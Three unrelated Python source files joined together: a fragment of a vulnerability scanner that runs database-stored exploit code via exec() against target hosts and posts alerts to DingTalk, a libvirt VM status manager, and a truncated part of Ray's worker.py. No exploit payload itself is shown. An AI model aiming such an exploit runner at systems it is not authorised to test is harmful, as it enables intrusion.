self.exploit_name = ExploitRegister.objects.filter(id=self.exploit_id).values_list("exploit_name")[0][0]
self.exploit_code = ExploitRegister.objects.filter(id=self.exploit_id).values_list("code")[0][0]
self.function_name = ExploitRegister.objects.filter(id=self.exploit_id).values_list("function_name")[0][0]
self.target_id = None
self.targets = []
if not debug:
self.targets = str(VulnerableScanTasks.objects.filter(id=task_id).values_list("targets")[0][0]).split(",")
self.targets = [] if self.targets == [""] else self.targets
self.target_id = VulnerableScanTasks.objects.filter(id=task_id).values_list("target")[0][0]
else:
self.target_id = ExploitRegister.objects.filter(id=task_id).values_list("target")[0][0]
if self.target_id is not None:
address = AssetList.objects.filter(id=self.target_id).values_list("ip_address")[0][0]
port = AssetList.objects.filter(id=self.target_id).values_list("port")[0][0]
self.targets.append("%s:%s" % (address, str(port)))
self.targets = list(set(self.targets))
self.cursor = ResultStruts(task_id, self.task_name)
self.logger = MyLogger(self.exploit_id, self.debug)
def function_execute_by_function_name(self, *args, **kwargs):
exec(self.exploit_code)
return eval(self.function_name)(*args, **kwargs)
def verify(self, address, port):
result = self.function_execute_by_function_name(address, port, self.logger)
if result:
message = "漏洞: %s %s %s\n" % (str(self.exploit_name), address, str(port))
if not self.debug:
dingtalker.send(message)
self.cursor.insert(address, port, result)
self.thread_size -= 1
def run(self):
for target in self.targets:
address, port = target.split(":")
port = int(port)
while True:
if self.thread_size < self.max_thread_count:
self.thread_size += 1
thread = threading.Thread(target=self.verify, args=(address, int(port),))
thread.start()
break
else:
continue
def start_scan(task_id):
scanner = VulnerableScanner(task_id)
scanner.run()
def debug(task_id):
scanner = VulnerableScanner(task_id, debug=True)
scanner.run() |
domain_status.py | #! /usr/bin/env python3
import threading
import time
import socket
import libvirt
import sys
sys.path.append("./common")
import xml_parsing
import sockets
HEARTBEATS_LOSS = 3
HEARTBEAT_CYCLE = 60
class HypervisorConnect():
def __init__(self, hypervisorURI):
self.__conn = self.__conn_hypervisor(hypervisorURI)
if self.__conn is None:
self.__criticalError = True
else:
self.__criticalError = False
def __conn_hypervisor(self, driver):
#connects with driver
try:
conn = libvirt.open(driver)
#conn = libvirt.open("test:///default")
return conn
except libvirt.libvirtError as e:
print("Cannot connect to hypervisor", driver)
return None
def check_running(self, name):
'''checks if gave domain is not down'''
try:
dom = self.__conn.lookupByName(name)
ID = dom.ID()
if ID == -1:
return False
return True
except libvirt.libvirtError as e:
print(e)
return False
def start_domain(self, name):
try:
dom = self.__conn.lookupByName(name)
if dom.ID() == -1:
dom.create()
return True
return False
except libvirt.libvirtError as e:
print(e)
return False
def shutdown_domain(self, name):
try:
dom = self.__conn.lookupByName(name)
if dom.ID() > -1:
dom.shutdown()
return True
return False
except libvirt.libvirtError as e:
print(e)
return False
def isCriticalError(self):
return self.__criticalError
def disconnect(self):
try:
self.__conn.close()
except libvirt.libvirtError as e:
print(e.get_error_message())
print ("Hypervisor connection closed")
#Thread to increment and expropriate domain if neccesary
def heartbeatIncrementWorker(domainsStatus, domainsLock):
while True:
time.sleep(HEARTBEAT_CYCLE)
#critical section to increment heartbetConters in domainsStatus list
domainsLock.acquire()
for dom in domainsStatus:
if dom.status.occupied:
dom.status.heartbeatCounter = dom.status.heartbeatCounter + 1
if dom.status.heartbeatCounter > HEARTBEATS_LOSS:
markNotUsing(dom)
domainsLock.release()
#Intilizes connection with hypervisor, create heartbeat thread and creates lock
#Returns True on success, False otherwise.
def prepareToWork(domainsStatus, config) -> bool:
global hyper
global domainsLock
hyper = HypervisorConnect(config['VIRTUALIZATION']['HYPERVISOR_URI'])
if hyper.isCriticalError():
return False
domainsLock = threading.Lock()
th = threading.Thread(target=heartbeatIncrementWorker, args=(domainsStatus, domainsLock), daemon=True)
th.start()
return True
#closes connection with chosen hypervisor
def closeHypervisor() -> None:
global hyper
hyper.disconnect()
pass
#Get status of domain. It's a reference to proper status of domain inside this software.
#It can be falsified when uses without caution.
#Returns Domain type on success, None otherwise.
def getDomain(domainList, name) -> xml_parsing.Domain:
for dom in domainList:
if dom.name == name:
return dom
return None
#Marks domain as using by owner (owner's address)
#Returns True on success, False otherwise.
def markUsing(dom, owner) -> bool:
if dom.status.occupied and dom.status.owner == owner:
return True
if not dom.status.occupied:
dom.status.owner = owner
dom.status.occupied = True
dom.status.heartbeatCounter = 0
return True
return False
#Marks domain as using by owner (owner's address)
#Returns True on success, False otherwise.
def markNotUsing(dom) -> bool:
if dom.status.occupied:
dom.status.owner = ''
dom.status.occupied = False
return True
return False
def updateDomainsStatus(domainList) -> None:
global domainsLock
domainsLock.acquire()
for dom in domainList:
dom.status.isRunning = hyper.check_running(dom.name)
domainsLock.release()
def handleHello(hello_path, sock):
with open(hello_path) as f:
content = f.readlines()
result = ''.join(content)[:-1]
try:
sockets.writeSocket(sock, (chr(sockets.HELLO) + result).encode(encoding='utf-8'))
except socket.timeout as err:
pass
#Checks conditions and mark as occupied if all are right
#Returns str if error occured with error message. It is intented sending it to client.
#Return None otherwise.
def connectHandle(data, domainList, sock, owner) -> str:
name = data.decode(encoding='utf-8')
domainsLock.acquire()
dom = getDomain(domainList, name)
if dom is None:
domainsLock.release()
return f'Domain {name} does not exist'
if not dom.status.isRunning:
domainsLock.release()
return f'Domain {name} does not work'
if not markUsing(dom, owner):
domainsLock.release()
return f'Domain {name} is already occupied'
try:
sockets.writeSocket(sock, (chr(sockets.CONNECT) + 'OK').encode(encoding='utf-8'))
except socket.timeout as err:
markNotUsing(dom)
domainsLock.release()
return None
#Checks conditions and mark as not occupied if all are right
#Returns str if error occured with error message. It is intented sending it to client.
#Return None otherwise.
def disconnectHandle(data, domainList, sock, owner) -> str:
name = data.decode(encoding='utf-8')
domainsLock.acquire()
dom = getDomain(domainList, name)
if dom is None:
domainsLock.release()
return f'Domain {name} does not exist'
if not dom.status.isRunning:
domainsLock.release()
return f'Domain {name} does not work'
if not markNotUsing(dom):
domainsLock.release()
return f'Domain {name} is not occupied'
domainsLock.release()
try:
sockets.writeSocket(sock, (chr(sockets.DISCONNECT) + 'OK').encode(encoding='utf-8'))
except socket.timeout as err:
pass
return None
#Zeros a heartbeatCounter for domains. It is used to check if client is still on the other side.
#Returns str if error occured with error message. It is intented sending it to client.
#Return None otherwise.
def heartbeatHandle(data, domainList, sock, owner) -> str:
name = data.decode(encoding='utf-8')
domainsLock.acquire()
dom = getDomain(domainList, name)
if dom is None:
domainsLock.release()
return f'Heartbeat - Domain {name} does not exist'
if not dom.status.isRunning:
domainsLock.release()
return f'Heartbeat - Domain {name} does not work'
if not dom.status.occupied:
domainsLock.release()
return f'Heartbeat - Domain {name} is not occupied'
if not dom.status.owner == owner:
domainsLock.release()
return f'Heartbeat - Domain {name} is not your property'
dom.status.heartbeatCounter = 0
domainsLock.release()
try:
sockets.writeSocket(sock, (chr(sockets.HEARTBEAT) + 'OK').encode(encoding='utf-8'))
except socket.timeout as err:
pass
return None
def bootHandle(data, domainList, sock) -> str:
name = data.decode(encoding='utf-8')
domainsLock.acquire()
dom = getDomain(domainList, name)
if dom is None:
domainsLock.release()
return f'Domain {name} does not exist.'
inside = dom.status.isRunning
outside = hyper.check_running(name)
domainsLock.release()
if outside == True and inside == True:
return f'Domain {name} is up, cannot boot.'
if outside != inside:
if outside:
return f'Domain {name} is down in hypervisor. If you really want to boot it up, refresh and try again, please.'
else:
return f'Domain {name} is already running but status has wrong information. Please refresh.'
if not hyper.start_domain(name):
return f'Domain {name} cannot be started.'
try:
sockets.writeSocket(sock, (chr(sockets.BOOT) + 'OK').encode(encoding='utf-8'))
except socket.timeout as err:
hyper.shutdown_domain(name)
def shutdownHandle(data, domainList, sock) -> str:
name = data.decode(encoding='utf-8')
domainsLock.acquire()
dom = getDomain(domainList, name)
if dom is None:
domainsLock.release()
return f'Domain {name} does not exist.'
inside = dom.status.isRunning
outside = hyper.check_running(name)
domainsLock.release()
if outside == False and inside == False:
return f'Domain {name} is down, cannot shutdown.'
if outside != inside:
if outside:
return f'Domain {name} is running in hypervisor. If you really want to shut it down, refresh and try again, please.'
else:
return f'Domain {name} is down in hypervisor. Please refresh.'
if not hyper.shutdown_domain(name):
return f'Domain {name} cannot be shuted down.'
dom.status.occupied = False
try:
sockets.writeSocket(sock, (chr(sockets.SHUTDOWN) + 'OK').encode(encoding='utf-8'))
except socket.timeout as err:
hyper.start_domain(name)
#Reloads data about virtual machines configured in XML file.
#Copies status of every still exeisting domains.
def changeToNewDomains(domainList, newList):
global domainsLock
domainsLock.acquire()
for tDom in newList:
for d in domainList:
if d.name == tDom.name:
d.status.copyStatus(tDom.status)
domainList.clear()
for tDom in newList:
domainList.append(tDom)
domainsLock.release()
|
worker.py | from contextlib import contextmanager
import atexit
import faulthandler
import hashlib
import inspect
import io
import json
import logging
import os
import redis
import sys
import threading
import time
import traceback
from typing import Any, Dict, List, Iterator
# Ray modules
from ray.autoscaler._private.constants import AUTOSCALER_EVENTS
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.cloudpickle as pickle
import ray.gcs_utils
import ray._private.memory_monitor as memory_monitor
import ray.node
import ray.job_config
import ray._private.parameter
import ray.ray_constants as ray_constants
import ray.remote_function
import ray.serialization as serialization
import ray._private.services as services
import ray._private.runtime_env as runtime_env_pkg
import ray._private.import_thread as import_thread
from ray.util.tracing.tracing_helper import import_from_string
from ray.util.annotations import PublicAPI, DeveloperAPI, Deprecated
import ray
import colorama
import setproctitle
import ray.state
from ray import (
ActorID,
JobID,
ObjectRef,
Language,
)
from ray import profiling
from ray.exceptions import (
RaySystemError,
RayError,
RayTaskError,
ObjectStoreFullError,
)
from ray._private.function_manager import FunctionActorManager
from ray._private.ray_logging import setup_logger
from ray._private.ray_logging import global_worker_stdstream_dispatcher
from ray._private.utils import check_oversized_function
from ray.util.inspect import is_cython
from ray.experimental.internal_kv import _internal_kv_get, \
_internal_kv_initialized
from ray._private.client_mode_hook import client_mode_hook
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SPILL_WORKER_MODE = 3
RESTORE_WORKER_MODE = 4
UTIL_WORKER_MODE = 5
ERROR_KEY_PREFIX = b"Error:"
# Logger for this module. It should be configured at the entry point
# into the program using Ray. Ray provides a default configuration at
# entry/init points.
logger = logging.getLogger(__name__)
# Visible for testing.
def _unhandled_error_handler(e: Exception):
logger.error("Unhandled error (suppress with "
"RAY_IGNORE_UNHANDLED_ERRORS=1): {}".format(e))
class Worker:
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
node (ray.node.Node): The node this worker is attached to.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE, and
WORKER_MODE.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
def __init__(self):
"""Initialize a Worker object."""
self.node = None
self.mode = None
self.cached_functions_to_run = []
self.actors = {}
# When the worker is constructed. Record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray._private.utils.get_cuda_visible_devices()
self.memory_monitor = memory_monitor.MemoryMonitor()
# A dictionary that maps from driver id to SerializationContext
# TODO: clean up the SerializationContext once the job finished.
self.serialization_context_map = {}
self.function_actor_manager = FunctionActorManager(self)
# This event is checked regularly by all of the threads so that they
# know when to exit.
self.threads_stopped = threading.Event()
# Index of the current session. This number will
# increment every time when `ray.shutdown` is called.
self._session_index = 0
# If this is set, the next .remote call should drop into the
# debugger, at the specified breakpoint ID.
self.debugger_breakpoint = b""
# If this is set, ray.get calls invoked on the object ID returned
# by the worker should drop into the debugger at the specified
# breakpoint ID.
self.debugger_get_breakpoint = b""
# If True, make the debugger external to the node this worker is
# running on.
self.ray_debugger_external = False
self._load_code_from_local = False
# Used to toggle whether or not logs should be filtered to only those
# produced in the same job.
self.filter_logs_by_job = True
@property
def connected(self):
"""bool: True if Ray has been started and False otherwise."""
return self.node is not None
@property
def node_ip_address(self):
self.check_connected()
return self.node.node_ip_address
@property
def load_code_from_local(self):
self.check_connected()
return self._load_code_from_local
@property
def current_job_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_current_job_id()
return JobID.nil()
@property
def actor_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_actor_id()
return ActorID.nil()
@property
def current_task_id(self):
return self.core_worker.get_current_task_id()
@property
def current_node_id(self):
return self.core_worker.get_current_node_id()
@property
def namespace(self):
return self.core_worker.get_job_config().ray_namespace
@property
def placement_group_id(self):
return self.core_worker.get_placement_group_id()
@property
def worker_id(self):
return self.core_worker.get_worker_id().binary()
@property
def should_capture_child_tasks_in_placement_group(self):
return self.core_worker.should_capture_child_tasks_in_placement_group()
@property
def current_session_and_job(self):
"""Get the current session index and job id as pair."""
assert isinstance(self._session_index, int)
assert isinstance(self.current_job_id, ray.JobID)
return self._session_index, self.current_job_id
@property
def runtime_env(self):
"""Get the runtime env in json format"""
return json.loads(
self.core_worker.get_job_config().runtime_env.raw_json)
def get_serialization_context(self, job_id=None):
"""Get the SerializationContext of the job that this worker is processing.
Args:
job_id: The ID of the job that indicates which job to get
the serialization context for.
Returns:
The serialization context of the given job.
"""
# This function needs to be protected by a lock, because it will be
# called by`register_class_for_serialization`, as well as the import
# thread, from different threads. Also, this function will recursively
# call itself, so we use RLock here.
if job_id is None:
job_id = self.current_job_id
with self.lock:
if job_id not in self.serialization_context_map:
self.serialization_context_map[
job_id] = serialization.SerializationContext(self)
return self.serialization_context_map[job_id]
def check_connected(self):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not self.connected:
if os.environ.get("RAY_ENABLE_AUTO_CONNECT", "") != "0":
ray.client().connect()
return
raise RaySystemError("Ray has not been started yet. You can "
"start Ray with 'ray.init()'.")
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode LOCAL_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will instead execute them in a blocking fashion.
Args:
mode: One of SCRIPT_MODE, WORKER_MODE, and LOCAL_MODE.
"""
self.mode = mode
def set_load_code_from_local(self, load_code_from_local):
self._load_code_from_local = load_code_from_local
def put_object(self, value, object_ref=None, owner_address=None):
"""Put value in the local object store with object reference `object_ref`.
This assumes that the value for `object_ref` has not yet been placed in
the local object store. If the plasma store is full, the worker will
automatically retry up to DEFAULT_PUT_OBJECT_RETRIES times. Each
retry will delay for an exponentially doubling amount of time,
starting with DEFAULT_PUT_OBJECT_DELAY. After this, exception
will be raised.
Args:
value: The value to put in the object store.
object_ref (ObjectRef): The object ref of the value to be
put. If None, one will be generated.
owner_address: The serialized address of object's owner.
Returns:
ObjectRef: The object ref the object was put under.
Raises:
ray.exceptions.ObjectStoreFullError: This is raised if the attempt
to store the object fails because the object store is full even
after multiple retries.
"""
# Make sure that the value is not an object ref.
if isinstance(value, ObjectRef):
raise TypeError(
"Calling 'put' on an ray.ObjectRef is not allowed "
"(similarly, returning an ray.ObjectRef from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ray.ObjectRef in a list and "
"call 'put' on it (or return it).")
if self.mode == LOCAL_MODE:
assert object_ref is None, ("Local Mode does not support "
"inserting with an ObjectRef")
serialized_value = self.get_serialization_context().serialize(value)
# This *must* be the first place that we construct this python
# ObjectRef because an entry with 0 local references is created when
# the object is Put() in the core worker, expecting that this python
# reference will be created. If another reference is created and
# removed before this one, it will corrupt the state in the
# reference counter.
return ray.ObjectRef(
self.core_worker.put_serialized_object(
serialized_value,
object_ref=object_ref,
owner_address=owner_address))
def raise_errors(self, data_metadata_pairs, object_refs):
out = self.deserialize_objects(data_metadata_pairs, object_refs)
if "RAY_IGNORE_UNHANDLED_ERRORS" in os.environ:
return
for e in out:
_unhandled_error_handler(e)
def deserialize_objects(self, data_metadata_pairs, object_refs):
# Function actor manager or the import thread may call pickle.loads
# at the same time which can lead to failed imports
# TODO: We may be better off locking on all imports or injecting a lock
# into pickle.loads (https://github.com/ray-project/ray/issues/16304)
with self.function_actor_manager.lock:
context = self.get_serialization_context()
return context.deserialize_objects(data_metadata_pairs,
object_refs)
def get_objects(self, object_refs, timeout=None):
"""Get the values in the object store associated with the IDs.
Return the values from the local object store for object_refs. This
will block until all the values for object_refs have been written to
the local object store.
Args:
object_refs (List[object_ref.ObjectRef]): A list of the object refs
whose values should be retrieved.
timeout (float): timeout (float): The maximum amount of time in
seconds to wait before returning.
Returns:
list: List of deserialized objects
bytes: UUID of the debugger breakpoint we should drop
into or b"" if there is no breakpoint.
"""
# Make sure that the values are object refs.
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError(
f"Attempting to call `get` on the value {object_ref}, "
"which is not an ray.ObjectRef.")
timeout_ms = int(timeout * 1000) if timeout else -1
data_metadata_pairs = self.core_worker.get_objects(
object_refs, self.current_task_id, timeout_ms)
debugger_breakpoint = b""
for (data, metadata) in data_metadata_pairs:
if metadata:
metadata_fields = metadata.split(b",")
if len(metadata_fields) >= 2 and metadata_fields[1].startswith(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):
debugger_breakpoint = metadata_fields[1][len(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):]
return self.deserialize_objects(data_metadata_pairs,
object_refs), debugger_breakpoint
def run_function_on_all_workers(self, function,
run_on_other_drivers=False):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
takes only one argument, a worker info dict. If it returns
anything, its return values will not be used.
run_on_other_drivers: The boolean that indicates whether we want to
run this function on other drivers. One case is we may need to
share objects across drivers.
"""
# If ray.init has not been called yet, then cache the function and
# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.shake_128(pickled_function).digest(
ray_constants.ID_SIZE)
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
if not function_exported:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
check_oversized_function(pickled_function, function.__name__,
"function", self)
# Run the function on all workers.
self.redis_client.hset(
key,
mapping={
"job_id": self.current_job_id.binary(),
"function_id": function_to_run_id,
"function": pickled_function,
"run_on_other_drivers": str(run_on_other_drivers),
})
self.redis_client.rpush("Exports", key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def sigterm_handler(signum, frame):
shutdown(True)
sys.exit(1)
ray._private.utils.set_sigterm_handler(sigterm_handler)
self.core_worker.run_task_loop()
sys.exit(0)
def print_logs(self):
"""Prints log messages from workers on all nodes in the same job.
"""
pubsub_client = self.redis_client.pubsub(
ignore_subscribe_messages=True)
pubsub_client.subscribe(ray.gcs_utils.LOG_FILE_CHANNEL)
localhost = services.get_node_ip_address()
try:
# Keep track of the number of consecutive log messages that have
# been received with no break in between. If this number grows
# continually, then the worker is probably not able to process the
# log messages as rapidly as they are coming in.
num_consecutive_messages_received = 0
job_id_binary = ray._private.utils.binary_to_hex(
self.current_job_id.binary())
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
msg = pubsub_client.get_message()
if msg is None:
num_consecutive_messages_received = 0
self.threads_stopped.wait(timeout=0.01)
continue
num_consecutive_messages_received += 1
if (num_consecutive_messages_received % 100 == 0
and num_consecutive_messages_received > 0):
logger.warning(
"The driver may not be able to keep up with the "
"stdout/stderr of the workers. To avoid forwarding "
"logs to the driver, use "
"'ray.init(log_to_driver=False)'.")
data = json.loads(ray._private.utils.decode(msg["data"]))
# Don't show logs from other drivers.
if (self.filter_logs_by_job and data["job"]
and job_id_binary != data["job"]):
continue
data["localhost"] = localhost
global_worker_stdstream_dispatcher.emit(data)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"print_logs: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
pubsub_client.close()
@PublicAPI
@client_mode_hook
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
Returns:
A list of GPU IDs.
"""
worker = global_worker
worker.check_connected()
if worker.mode != WORKER_MODE:
logger.warning(
"`ray.get_gpu_ids()` will always return the empty list when "
"called from the driver. This is because Ray does not manage "
"GPU allocations to the driver process.")
# TODO(ilr) Handle inserting resources in local mode
all_resource_ids = global_worker.core_worker.resource_ids()
assigned_ids = set()
for resource, assignment in all_resource_ids.items():
# Handle both normal and placement group GPU resources.
# Note: We should only get the GPU ids from the placement
# group resource that does not contain the bundle index!
import re
if resource == "GPU" or re.match(r"^GPU_group_[0-9A-Za-z]+$",
resource):
for resource_id, _ in assignment:
assigned_ids.add(resource_id)
assigned_ids = list(assigned_ids)
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [
global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
]
# Give all GPUs in local_mode.
if global_worker.mode == LOCAL_MODE:
max_gpus = global_worker.node.get_resource_spec().num_gpus
assigned_ids = global_worker.original_gpu_ids[:max_gpus]
return assigned_ids
@Deprecated
def get_resource_ids():
"""Get the IDs of the resources that are available to the worker.
Returns:
A dictionary mapping the name of a resource to a list of pairs, where
each pair consists of the ID of a resource and the fraction of that
resource reserved for this worker.
"""
worker = global_worker
worker.check_connected()
if _mode() == LOCAL_MODE:
raise RuntimeError(
"ray.worker.get_resource_ids() currently does not work in "
"local_mode.")
return global_worker.core_worker.resource_ids()
@Deprecated
def get_dashboard_url():
"""Get the URL to access the Ray dashboard.
Note that the URL does not specify which node the dashboard is on.
Returns:
The URL of the dashboard as a string.
"""
worker = global_worker
worker.check_connected()
return _global_node.webui_url
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
_global_node = None
"""ray.node.Node: The global node object that is created by ray.init()."""
@PublicAPI
@client_mode_hook
def init(
address=None,
*,
num_cpus=None,
num_gpus=None,
resources=None,
object_store_memory=None,
local_mode=False,
ignore_reinit_error=False,
include_dashboard=None,
dashboard_host=ray_constants.DEFAULT_DASHBOARD_IP,
dashboard_port=None,
job_config=None,
configure_logging=True,
logging_level=logging.INFO,
logging_format=ray_constants.LOGGER_FORMAT,
log_to_driver=True,
namespace=None,
runtime_env=None,
# The following are unstable parameters and their use is discouraged.
_enable_object_reconstruction=False,
_redis_max_memory=None,
_plasma_directory=None,
_node_ip_address=ray_constants.NODE_DEFAULT_IP,
_driver_object_store_memory=None,
_memory=None,
_redis_password=ray_constants.REDIS_DEFAULT_PASSWORD,
_temp_dir=None,
_lru_evict=False,
_metrics_export_port=None,
_system_config=None,
_tracing_startup_hook=None,
**kwargs):
"""
Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases; either a Ray cluster already exists and we
just attach this driver to it or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
To start Ray locally and all of the relevant processes, use this as
follows:
.. code-block:: python
ray.init()
To connect to an existing local cluster, use this as follows (substituting
in the appropriate port if needed).
.. code-block:: python
ray.init(address="localhost:6379")
To connect to an existing remote cluster, use this as follows (substituting
in the appropriate address). Note the addition of "ray://" at the beginning
of the address.
.. code-block:: python
ray.init(address="ray://123.45.67.89:10001")
More details for starting and connecting to a remote cluster can be found
here: https://docs.ray.io/en/master/cluster/ray-client.html
You can also define an environment variable called `RAY_ADDRESS` in
the same format as the `address` parameter to connect to an existing
cluster with ray.init() or ray.init(address="auto").
Args:
address (str): The address of the Ray cluster to connect to. If
this address is not provided, then this command will start Redis,
a raylet, a plasma store, a plasma manager, and some workers.
It will also kill these processes when Python exits. If the driver
is running on a node in a Ray cluster, using `auto` as the value
tells the driver to detect the the cluster, removing the need to
specify a specific node address. If the environment variable
`RAY_ADDRESS` is defined and the address is None or "auto", Ray
will set `address` to `RAY_ADDRESS`.
Addresses can be prefixed with a "ray://" to connect to a remote
cluster. For example, passing in the address
"ray://123.45.67.89:50005" will connect to the cluster at the
given address.
num_cpus (int): Number of CPUs the user wishes to assign to each
raylet. By default, this is set based on virtual cores.
num_gpus (int): Number of GPUs the user wishes to assign to each
raylet. By default, this is set based on detected GPUs.
resources: A dictionary mapping the names of custom resources to the
quantities for them available.
object_store_memory: The amount of memory (in bytes) to start the
object store with. By default, this is automatically set based on
available system memory.
local_mode (bool): If true, the code will be executed serially. This
is useful for debugging.
ignore_reinit_error: If true, Ray suppresses errors from calling
ray.init() a second time. Ray won't be restarted.
include_dashboard: Boolean flag indicating whether or not to start the
Ray dashboard, which displays the status of the Ray
cluster. If this argument is None, then the UI will be started if
the relevant dependencies are present.
dashboard_host: The host to bind the dashboard server to. Can either be
localhost (127.0.0.1) or 0.0.0.0 (available from all interfaces).
By default, this is set to localhost to prevent access from
external machines.
dashboard_port(int, None): The port to bind the dashboard server to.
Defaults to 8265 and Ray will automatically find a free port if
8265 is not available.
job_config (ray.job_config.JobConfig): The job configuration.
configure_logging: True (default) if configuration of logging is
allowed here. Otherwise, the user may want to configure it
separately.
logging_level: Logging level, defaults to logging.INFO. Ignored unless
"configure_logging" is true.
logging_format: Logging format, defaults to string containing a
timestamp, filename, line number, and message. See the source file
ray_constants.py for details. Ignored unless "configure_logging"
is true.
log_to_driver (bool): If true, the output from all of the worker
processes on all nodes will be directed to the driver.
namespace (str): Namespace to use
runtime_env (dict): The runtime environment to use for this job.
_enable_object_reconstruction (bool): If True, when an object stored in
the distributed plasma store is lost due to node failure, Ray will
attempt to reconstruct the object by re-executing the task that
created the object. Arguments to the task will be recursively
reconstructed. If False, then ray.ObjectLostError will be
thrown.
_redis_max_memory: Redis max memory.
_plasma_directory: Override the plasma mmap file directory.
_node_ip_address (str): The IP address of the node that we are on.
_driver_object_store_memory (int): Deprecated.
_memory: Amount of reservable memory resource to create.
_redis_password (str): Prevents external clients without the password
from connecting to Redis if provided.
_temp_dir (str): If provided, specifies the root temporary
directory for the Ray process. Defaults to an OS-specific
conventional location, e.g., "/tmp/ray".
_metrics_export_port(int): Port number Ray exposes system metrics
through a Prometheus endpoint. It is currently under active
development, and the API is subject to change.
_system_config (dict): Configuration for overriding
RayConfig defaults. For testing purposes ONLY.
_tracing_startup_hook (str): If provided, turns on and sets up tracing
for Ray. Must be the name of a function that takes no arguments and
sets up a Tracer Provider, Remote Span Processors, and
(optional) additional instruments. See more at
docs.ray.io/tracing.html. It is currently under active development,
and the API is subject to change.
Returns:
If the provided address includes a protocol, for example by prepending
"ray://" to the address to get "ray://1.2.3.4:10001", then a
ClientContext is returned with information such as settings, server
versions for ray and python, and the dashboard_url. Otherwise,
returns address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
# If available, use RAY_ADDRESS to override if the address was left
# unspecified, or set to "auto" in the call to init
address_env_var = os.environ.get(
ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE)
if address_env_var:
if address is None or address == "auto":
address = address_env_var
logger.info(
f"Using address {address_env_var} set in the environment "
f"variable {ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE}")
if address is not None and "://" in address:
# Address specified a protocol, use ray client
builder = ray.client(address)
# Forward any keyword arguments that were changed from their default
# values to the builder
init_sig = inspect.signature(init)
passed_kwargs = {}
for argument_name, param_obj in init_sig.parameters.items():
if argument_name in {"kwargs", "address"}:
# kwargs and address are handled separately
continue
default_value = param_obj.default
passed_value = locals()[argument_name]
if passed_value != default_value:
# passed value is different than default, pass to the client
# builder
passed_kwargs[argument_name] = passed_value
passed_kwargs.update(kwargs)
builder._init_args(**passed_kwargs)
return builder.connect()
if kwargs:
# User passed in extra keyword arguments but isn't connecting through
# ray client. Raise an error, since most likely a typo in keyword
unknown = ", ".join(kwargs)
raise RuntimeError(f"Unknown keyword argument(s): {unknown}")
# Try to increase the file descriptor limit, which is too low by
# default for Ray: https://github.com/ray-project/ray/issues/11239
try:
import resource
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < hard:
# https://github.com/ray-project/ray/issues/12059
soft = max(soft, min(hard, 65536))
logger.debug("Automatically increasing RLIMIT_NOFILE to max "
"value of {}".format(hard))
try:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except ValueError:
logger.debug("Failed to raise limit.")
soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < 4096:
logger.warning(
"File descriptor limit {} is too low for production "
"servers and may result in connection errors. "
"At least 8192 is recommended. --- "
"Fix with 'ulimit -n 8192'".format(soft))
except ImportError:
logger.debug("Could not import resource module (on Windows)")
pass
if runtime_env:
if job_config is None:
job_config = ray.job_config.JobConfig()
job_config.set_runtime_env(runtime_env)
# Convert hostnames to numerical IP address.
if _node_ip_address is not None:
node_ip_address = services.address_to_ip(_node_ip_address)
raylet_ip_address = node_ip_address
if address:
redis_address, _, _ = services.validate_redis_address(address)
else:
redis_address = None
